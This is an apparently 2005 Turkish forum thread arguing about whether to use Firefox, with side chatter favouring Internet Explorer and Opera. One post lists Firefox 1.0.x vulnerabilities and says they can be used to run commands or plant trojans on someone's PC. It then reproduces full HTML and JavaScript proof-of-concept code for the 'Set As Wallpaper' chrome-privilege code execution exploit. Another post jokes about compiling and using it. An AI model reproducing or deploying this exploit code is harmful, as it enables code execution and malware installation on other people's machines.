Firefox Kullanma
-
firefoxun opensource olmasının dezavantajlarıda var rahatca exploit geliştirilebiliyor işte en son exploitler;
12.07.2005 : Mozilla Firefox <= 1.0.4 "Set As Wallpaper" Code Execution Exploit
12.07.2005 : Mozilla Firefox <= 1.0.4 "data:" URLs Remote Script injection Exploit
12.07.2005 : Mozilla Firefox <= 1.0.4 "IMG" Elements Code Execution Exploit
05.07.2005 : Mozilla Firefox <= 1.0.1 GIF Image Handling Heap Overflow Exploitbunlarla rahatca <img> tagı ile adamın pc de komut çalıştırabilir trojan yükleme gibi bilimum faaliyetlerde bulunabilirsiniz...
-
exloitlerden en güzelinide yayınlıorum
// Exploit by moz_bug_r_a4
<?xml version="1.0"?>
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<style>
IMG {
display: block;
width: 96px; height: 96px;
border: 1px solid #f00;
/*background-image: url("http://www.mozilla.org/images/mozilla-16.png");*/
background-image: url("data:image/png;base64,iVBORw0KGgoAAAANSUhEUg
AAABAAAAAQCAYAAAAf8/9hAAAABGdBTUEAAK/INwWK6QAAABl0RVh0U29md
HdhcmUAQWRvYmUgSW1hZ2VSZWFkeXHJZTwAAAHWSURBVHjaYvz//z8DJQAg
gJiQOe/fv2fv7Oz8rays/N+VkfG/iYnJfyD/1+rVq7ffu3dPFpsBAAHEAHIBCJ85c8bN
2Nj4vwsDw/8zQLwKiO8CcRoQu0DxqlWrdsHUwzBAAIGJmTNnPgYa9j8UqhFElwP
xf2MIDeIrKSn9FwSJoRkAEEAM0DD4DzMAyPi/G+QKY4hh5WAXGf8PDQ0FGwJ2
2d27CjADAAIIrLmjo+MXA9R2kAHvGBA2wwx6B8W7od6CeQcggKCmCEL8bgwx
YCbUIGTDVkHDBia+CuotgACCueD3TDQN75D4xmAvCoK9ARMHBzAw0AECiBH
kAlC0Mdy7x9ABNA3obAZXIAa6iKEcGlMVQHwWyjYuL2d4v2cPg8vZswx7gHyAA
AK7AOif7SAbOqCmn4Ha3AHFsIDtgPq/vLz8P4MSkJ2W9h8ggBjevXvHDo4FQUQ
g/kdypqCg4H8lUIACnQ/SOBMYI8bAsAJFPcj1AAEEjwVQqLpAbXmH5BJjqI0gi9D
TAAgDBBCcAVLkgmQ7yKCZxpCQxqUZhAECCJ4XgMl493ug21ZD+aDAXH0WL
M4A9MZPXJkJIIAwTAR5pQMalaCABQUULttBGCCAGCnNzgABBgAMJ5THwGvJL
AAAAABJRU5ErkJggg==");
}
</style>
</head>
<body>
<h3>Arbitrary code execution via setWallpaper()</h3>
<pre>
1. Right click on the image.
2. Choose "Set As Wallpaper..." from the context menu.
A dialog that shows Components.stack will appear.
</pre>
<IMG id="i"/>
<script>
<![CDATA[
var sx = navigator.productSub < 20050622 ? 2 : 4;
// it needs chrome privilege to get |Components.stack|
var code = "alert('Exploit!\\n\\n' + Components.stack);";
var evalCode = code.replace(/'/g, '"').replace(/\\/g, '\\\\');
var u = [ "http://www.mozilla.org/images/mozilla-16.png",
"javascript:eval('" + evalCode + "')" ];
var sc = 0;
var i = document.getElementById("i");
i.addEventListener("contextmenu", function(e) { sc = 0; }, false);
i.__defineGetter__("src", function() {
//return (confirm(++sc)) ? u[0] : u[1];
return (++sc < sx) ? u[0] : u[1];
});
]]>
</script>
</body>
</html> -
Firefox un büyük düşüşü oldu sayılır... Herkesin büyük güveni oluşmuştu , açık kod , güvenli imajları... Alınan ödüller
- PC World Product of the Year
June 2005- PC Magazine Editors’ Choice Award
May 2005- CNET Editors’ Choice
Nov 2004Sonuç.. Karizma sıfır :)
- PC World Product of the Year
-
bi sonraki versiona düzeltirler ama güvenmiom artık ben :)
bu arada exploiti kullanmak için az java html bilgisine ihtiyacınız war... base64 lü bölümü decode edin anlarsınız ne olduğunu kodun
-
Explorer Rulezz..... Bill Gates abim ie 7 yide yayınlıor nede olsa ;)
-
Abiler iyi güzel diyorsunuz da,ne spy giriyor nede dialer onuda geç zaten otomatikupdate var yeni versiyon çıktığı anda çat diye indirebilirsin cin ol zamanında indir hiç bir şey olmaz!
-
En iyisi standart olalanı kullanmak, bu sene yaptığım siteyi internet explorere göre yaptım ondan sonra bitti du bir firefox ile deniyeyim hızlı açılıyormu dedim bir baktım a.k linkler yazı gibi görünüyor, hücrelerin iç kenarlıkları çıkmış, flash'lar kod şeklinde çıkıyor, avatarlar sola kaymış hay dedim böyle tarayıcının a.k...
-
en kralı opera. rss/xml desteğide var.
-
şşu exploiti bir derliyip kullanalım bakalım :)
-
http://www.tahribat.com/haberdetay.asp?id=66
Al sana İnternet Explorer..
Bende yaklaşık 2-3 haftadır test aşamlı Firefox kurdum sistemime.
İnternet Explorer'dan gayet hızlı. En iyisi hafif olması. IE'eki bir çok gereksiz şey firefox 'da yok.. bunun yerine eklentileri var..
Eğer sitesindeki eklentilere göz atılacak olursa web developer için de bir çok özellikler var. Cookies editor,Form editor. Link editor vs.
bence firefox sağ kulvardan çok manyak şekilde geliyor..
-
2 hafta kullandım Firefox u , ilk zaman insan yadırgıyor , IE yada Opera olsun alıştıysa , ama Firefox ada alışan adam için IE kötü geliyor.. Şuan ikiside bence gayet ii , Firefoxde IMG lerin açılışı biraz kötü sadece... Yoksa gayet güzel...